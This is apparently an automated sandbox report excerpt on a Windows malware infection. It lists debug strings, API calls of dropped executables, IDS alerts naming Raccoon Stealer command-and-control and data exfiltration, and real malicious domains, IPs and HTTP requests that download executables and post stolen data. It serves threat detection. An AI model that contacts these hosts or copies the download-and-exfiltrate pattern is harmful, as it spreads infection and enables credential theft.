Source: Binary string: wimm32.pdb | source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb | source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb | source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb | source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdbv | source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( | source: WerFault.exe, 0000001A.00000003.355300183.0000000003672000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.356247461.0000000003672000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb | source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb | source: B1B2.exe, 00000014.00000000.334478486.0000000000413000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.343212792.0000000000413000.00000002.00020000.sdmp
Source: Binary string: wgdi32full.pdb | source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
Source: Binary string: /C:\vofihewakizabu\tesuvahatu\woru.pdbh | source: 3136.exe, 0000001D.00000000.359623622.0000000000401000.00000020.00020000.sdmp, 3136.exe, 0000001D.00000002.381021289.00000000008F9000.00000004.00000001.sdmp, xqfkdfcl.exe, 0000002A.00000000.380594981.0000000000401000.00000020.00020000.sdmp
Source: Binary string: fltLib.pdbr | source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbt source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdbV source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb\ source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbZ source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb" source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdbura source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: C:\vofihewakizabu\tesuvahatu\woru.pdb source: 3136.exe, 0000001D.00000000.359623622.0000000000401000.00000020.00020000.sdmp, 3136.exe, 0000001D.00000002.381021289.00000000008F9000.00000004.00000001.sdmp, xqfkdfcl.exe, 0000002A.00000000.380594981.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001A.00000003.355319445.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355100434.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355698589.0000000003678000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: B1B2.exe, 00000014.00000000.334478486.0000000000413000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.343212792.0000000000413000.00000002.00020000.sdmp
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Code function: 0_2_00419A0C GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C8A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C12E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C14D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C6090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C9930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C9BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C9D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,

                      Networking:

                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                      Source: Traffic | Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49901 -> 185.163.204.24:80
                      Source: Traffic | Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.5:49924 -> 74.201.28.62:80
                      Source: Traffic | Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49940 -> 185.163.204.24:80
                      Source: Traffic | Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49940 -> 185.163.204.24:80
                      Source: Traffic | Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49901 -> 185.163.204.24:80
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 40.93.207.0 25
                      Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 94.142.143.116 443
                      Source: C:\Windows\SysWOW64\svchost.exe | Domain query: patmushta.info
                      Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exe | Network Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exe | Domain query: unicupload.top
                      Source: C:\Windows\explorer.exe | Network Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exe | Network Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exe | Domain query: privacy-tools-for-you-780.com
                      Source: C:\Windows\SysWOW64\svchost.exe | Domain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exe | Domain query: goo.su
                      Source: C:\Windows\explorer.exe | Domain query: transfer.sh
                      Source: C:\Windows\explorer.exe | Network Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exe | Domain query: data-host-coin-8.com
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknown | DNS query: name: api.telegram.org
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: c9d0e790b353537889bd47a364f5acff43c11f248.xyz
                      Source: global traffic | HTTP traffic detected: GET /book/KB5009812.png HTTP/1.1 | Host: 74.201.28.62 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:00 GMT | Content-Type: application/x-msdos-program | Content-Length: 301056 | Connection: close | Last-Modified: Mon, 10 Jan 2022 12:06:49 GMT | ETag: "49800-5d5392be00934" | Accept-Ranges: bytes
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:03 GMT | Content-Type: application/x-msdos-program | Content-Length: 321024 | Connection: close | Last-Modified: Fri, 14 Jan 2022 20:05:01 GMT | ETag: "4e600-5d590516adb4b" | Accept-Ranges: bytes
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:08 GMT | Content-Type: application/x-msdos-program | Content-Length: 324096 | Connection: close | Last-Modified: Fri, 14 Jan 2022 20:05:01 GMT | ETag: "4f200-5d590516c13cb" | Accept-Ranges: bytes
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:41 GMT | Content-Type: application/x-msdos-program | Content-Length: 905216 | Connection: close | Last-Modified: Thu, 13 Jan 2022 15:53:07 GMT | ETag: "dd000-5d578aeb4049d" | Accept-Ranges: bytes
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 14 Jan 2022 20:05:47 GMT | Server: Apache/2.4.38 (Win32) PHP/7.1.26 | Last-Modified: Fri, 14 Jan 2022 17:15:09 GMT | ETag: "6ff1c7-5d58df1eec44d" | Accept-Ranges: bytes | Content-Length: 7336391 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Content-Type: application/octet-stream | Last-Modified: Fri, 14 Jan 2022 18:57:27 GMT | Accept-Ranges: bytes | ETag: "9bd1193789d81:0" | Server: Microsoft-IIS/10.0 | X-Powered-By: ASP.NET | Date: Fri, 14 Jan 2022 20:05:54 GMT | Content-Length: 54272
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:06:00 GMT | Content-Type: application/x-msdos-program | Content-Length: 905216 | Connection: close | Last-Modified: Thu, 13 Jan 2022 15:53:07 GMT | ETag: "dd000-5d578aeb4049d" | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:06:04 GMT | Content-Type: application/x-msdos-program | Content-Length: 557664 | Connection: close | Last-Modified: Thu, 13 Jan 2022 19:20:04 GMT | ETag: "88260-5d57b92d7ebed" | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 14 Jan 2022 20:06:06 GMT | Server: Apache/2.4.38 (Win32) PHP/7.1.26 | Last-Modified: Fri, 14 Jan 2022 16:06:29 GMT | ETag: "6ff1c1-5d58cfc604e56" | Accept-Ranges: bytes | Content-Length: 7336385 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
Source: unknown | HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49949 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49950 version: TLS 1.0
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xmmufccsxa.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 257 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ejoocwvno.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 196 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ymxxgm.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 232 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vxhncf.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 206 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://csftwsmo.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 186 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fdbmpnrkfj.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 297 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jxeebf.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 149 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kxkku.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 246 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fdcyfq.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 266 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lujat.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 249 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ttjdaam.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 154 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uqfbvly.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 194 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: privacy-tools-for-you-780.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hwyvhm.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 177 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://idmvulr.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 159 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /install5.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vooxhw.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 224 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vvdrjru.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 191 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ubjcetayse.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 207 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://sxcrq.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 146 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /game.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ywlgtk.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 148 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://foglcav.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 207 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hnhyhp.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 113 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nefwc.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 161 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /6.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.7.214.171:8080
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fsakwxty.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 245 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jcjkx.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 188 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lhgju.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 138 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bsjhi.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 268 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bypwmjeu.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 248 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tmxneir.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 199 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ukskogxssc.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 185 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lnvtcbw.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 318 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://skipwlik.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 244 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://stogr.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 111 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ldxocdirn.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 195 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://usarcmaqw.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 130 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://drmput.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 309 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wktbs.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 331 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ycnydaydt.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 205 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ymgfpln.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 324 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dxepeeelwv.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 245 | Host: host-data-coin-11.com
